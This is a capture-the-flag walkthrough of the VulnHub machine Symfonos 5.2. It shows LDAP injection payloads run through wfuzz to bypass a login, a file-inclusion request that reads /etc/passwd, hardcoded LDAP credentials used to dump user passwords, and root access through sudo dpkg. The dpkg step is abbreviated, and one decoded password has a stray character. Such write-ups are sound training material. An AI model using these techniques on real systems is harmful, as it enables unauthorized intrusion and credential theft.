VulnHub Symfonos5.2
30 May, 2021
Machine Link: https://www.vulnhub.com/entry/symfonos-52,415/
Beginning with an nmap scan
# nmap -A -p 1-20000 192.168.56.124
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.124
Host is up (0.00100s latency).
Not shown: 19996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
| 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_ 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
636/tcp open ldapssl?
MAC Address: 08:00:27:5C:A1:4E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.00 ms 192.168.56.124
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
Found a few files using gobuster
```bash
$ ./gobuster dir -r -u http://192.168.56.124 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://192.168.56.124 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Follow Redirect: true [+] Timeout: 10s
Starting gobuster in directory enumeration mode
/home.php (Status: 200) [Size: 1650] /admin.php (Status: 200) [Size: 1650] /static (Status: 200) [Size: 1745] /logout.php (Status: 200) [Size: 1650] /portraits.php (Status: 200) [Size: 165] /server-status (Status: 403) [Size: 279]
Finished
`home.php` was always redirecting towards `admin.php` and `portraits.php` was a directory listing with images. On `admin.php` I tried a number of SQL injection paylods but none seemed to work. After a lot of searching and reading, I got to know about LDAP injection. An application is vulnerable to LDAP injection if it uses unsanitized user input (in this case username and password) to execute LDAP queries. Using [this](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt) list of payloads with `wfuzz` I was able to get bypass the login mechanism.
```bash
# wfuzz -c -w LDAP_FUZZ.txt -H 'Cookie: PHPSESSID=8haqh8cjbvemia7lm7roe7r6kh' "http://192.168.56.124/admin.php?username=FUZZ&password=admin"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.124/admin.php?username=FUZZ&password=admin
Total requests: 46
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000031: 200 39 L 80 W 1663 Ch ")"
000000015: 200 39 L 80 W 1663 Ch "|"
000000030: 200 39 L 80 W 1663 Ch "("
000000033: 200 39 L 80 W 1663 Ch "*(|(mail=*))"
000000026: 200 39 L 80 W 1663 Ch "%2A%28%7C%28objectclass%3D%2A%29%29"
000000027: 200 39 L 80 W 1663 Ch "%2A%7C"
000000007: 200 39 L 80 W 1663 Ch "*(|(objectclass=*))"
000000001: 200 39 L 80 W 1663 Ch "*"
000000025: 302 0 L 0 W 0 Ch "%2A%28%7C%28mail%3D%2A%29%29```
...
The URL for portraits looks like this site is vulnerable to RFI
# curl 'http://192.168.56.124/home.php?url=/etc/passwd' -H 'Cookie: PHPSESSID=8haqh8cjbvemia7lm7roe7r6kh' 130 тип
<html>
<head>
<link rel="stylesheet" type="text/css" href="/static/bootstrap.min.css">
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<a class="navbar-brand" href="home.php">symfonos</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor02" aria-controls="navbarColor02" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarColor02">
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="home.php">Home</a>
</li>
<li class="nav-item">
<a class="nav-link" href="home.php?url=http://127.0.0.1/portraits.php">Portraits</a>
</li>
<li class="nav-item">
<a class="nav-link" href="logout.php">Logout</a>
</li>
</ul>
</div>
</nav><br />
<center>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
</center>
</body>
I took a look at admin.php and found credentials for LDAP
function authLdap($username, $password) {
$ldap_ch = ldap_connect("ldap://172.18.0.22");
ldap_set_option($ldap_ch, LDAP_OPT_PROTOCOL_VERSION, 3);
if (!$ldap_ch) {
return FALSE;
}
$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
if (!$bind) {
return FALSE;
}
$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);
if (!$result) {
return FALSE;
}
$info = ldap_get_entries($ldap_ch, $result);
if (!($info) || ($info["count"] == 0)) {
return FALSE;
}
return TRUE;
}
Using ldapsearch with the credentials got me some more information
# ldapsearch -x -h 192.168.56.124 -D 'cn=admin,dc=symfonos,dc=local' -w 'qMDdyZh3cT6eeAWD' -b "dc=symfonos,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos
# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=
# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User
# search result
search: 2
result: 0 Success
# numResponses: 4
# numEntries: 3
Using zeus' password, I was able to SSH in
# Administrator's password
# echo "e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=" | base64 --decode
{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm
# zeus' password
# echo "Y2V0a0tmNHdDdUhDOUZFVA==" | base64 --decode
cetkKf4wCuHC9FETo
# ssh zeus@192.168.56.124
The authenticity of host '192.168.56.124 (192.168.56.124)' can't be established.
ECDSA key fingerprint is SHA256:0LrOVGfXWfj1Vtdo1krp85ZDlnsb3DDJFap9cOF5WoA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.124' (ECDSA) to the list of known hosts.
zeus@192.168.56.124's password:
Linux symfonos5 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb 5 06:14:43 2020 from 172.16.1.1
zeus@symfonos5:~$
zeus is allowed to run dpkg as sudo
zeus@symfonos5:~$ sudo -l
Matching Defaults entries for zeus on symfonos5:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zeus may run the following commands on symfonos5:
(root) NOPASSWD: /usr/bin/dpkg
GTFO!! https://gtfobins.github.io/gtfobins/dpkg/
zeus@symfonos5:~$ sudo dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-=============================-===========================-============-===============================================================================
ii adduser 3.118 all add and remove users and groups
ii ame 1.0 amd64 no description given
ii apparmor 2.13.2-10 amd64 user-space parser utility for AppArmor
ii apt 1.8.2 amd64 commandline package manager
ii apt-listchanges 3.19 all package change history notification tool
ii apt-transport-https 1.8.2 all transitional package for https support
ii apt-utils 1.8.2 amd64 package management related utility programs
ii aufs-dkms 4.19+20190211-1 all DKMS files to build and install aufs
ii aufs-tools 1:4.14+20190211-1 amd64 Tools to manage aufs filesystems
ii base-files 10.3+deb10u2 amd64 Debian base system miscellaneous files
ii base-passwd 3.5.46 amd64 Debian base system master password and group files
ii bash 5.0-4 amd64 GNU Bourne Again SHell
ii bash-completion 1:2.8-6 all programmable completion for the bash shell
ii bind9-host 1:9.11.5.P4+dfsg-5.1 amd64 DNS lookup utility (deprecated)
ii binutils 2.31.1-16 amd64 GNU assembler, linker and binary utilities
ii binutils-common:amd64 2.31.1-16 amd64 Common files for the GNU assembler, linker and binary utilities
ii binutils-x86-64-linux-gnu 2.31.1-16 amd64 GNU binary utilities, for x86-64-linux-gnu target
ii bsdmainutils 11.1.2+b1 amd64 collection of more utilities from FreeBSD
ii bsdutils 1:2.33.1-0.1 amd64 basic utilities from 4.4BSD-Lite
ii build-essential 12.6 amd64 Informational list of build-essential packages
ii busybox 1:1.30.1-4 amd64 Tiny utilities for small and embedded systems
ii bzip2 1.0.6-9.2~deb10u1 amd64 high-quality block-sorting file compressor - utilities
ii ca-certificates 20190110 all Common CA certificates
ii cgroupfs-mount 1.4 all Light-weight package to set up cgroupfs mounts
ii console-setup 1.193~deb10u1 all console font and keymap setup program
ii console-setup-linux 1.193~deb10u1 all Linux specific part of console-setup
ii containerd.io 1.2.10-3 amd64 An open and reliable container runtime
ii coreutils 8.30-3 amd64 GNU core utilities
ii cpio 2.12+dfsg-9 amd64 GNU cpio -- a program to manage archives of files
ii cpp 4:8.3.0-1 amd64 GNU C preprocessor (cpp)
ii cpp-8 8.3.0-6 amd64 GNU C preprocessor
ii cron 3.0pl1-134+deb10u1 amd64 process scheduling daemon
ii curl 7.64.0-4 amd64 command line tool for transferring data with URL syntax
ii dash 0.5.10.2-5 amd64 POSIX-compliant shell
ii dbus 1.12.16-1 amd64 simple interprocess messaging system (daemon and utilities)
ii debconf 1.5.71 all Debian configuration management system
ii debconf-i18n 1.5.71 all full internationalization support for debconf
ii debian-archive-keyring 2019.1 all GnuPG archive keys of the Debian archive
ii debian-faq 9.0 all Debian Frequently Asked Questions
ii debianutils 4.8.6.1 amd64 Miscellaneous utilities specific to Debian
ii dictionaries-common 1.28.1 all spelling dictionaries - common utilities
ii diffutils 1:3.7-3 amd64 File comparison utilities
ii dirmngr 2.2.12-1+deb10u1 amd64 GNU privacy guard - network certificate management service
ii discover 2.1.2-8 amd64 hardware identification system
ii discover-data 2.2013.01.11 all Data lists for Discover hardware detection system
ii distro-info-data 0.41+deb10u1 all information about the distributions' releases (data files)
ii dkms 2.6.1-4 all Dynamic Kernel Module Support Framework
ii dmidecode 3.2-1 amd64 SMBIOS/DMI table decoder
!/bin/bash
root@symfonos5:/home/zeus# id
uid=0(root) gid=0(root) groups=0(root)
root@symfonos5:/home/zeus# cd /root
root@symfonos5:~# ls
proof.txt
root@symfonos5:~# cat proof.txt
Congrats on rooting symfonos:5!
ZEUS
* . dZZZZZ, . *
dZZZZ ZZ,
* . ,AZZZZZZZZZZZ `ZZ,_ *
,ZZZZZZV' ZZZZ `Z,`\
,ZZZ ZZ . ZZZZ `V
* ZZZZV' ZZ ZZZZ \_ .
. V l . ZZ ZZZZZZ .
l \ ZZ, ZZZ ZZZZZZ,
. / ZZ l ZZZ ZZZ `Z,
ZZ l ZZZ Z Z, `Z, *
. ZZ ZZZ Z Z, `l
Z ZZ V `Z \
V ZZC l V
Z l V ZR l .
\ \ l ZA
\ C C
\ K / / K
A \ \ | / / /
\ \\|/ / /
__________________________________\|/_________________________
Contact me via Twitter @zayotic to give feedback!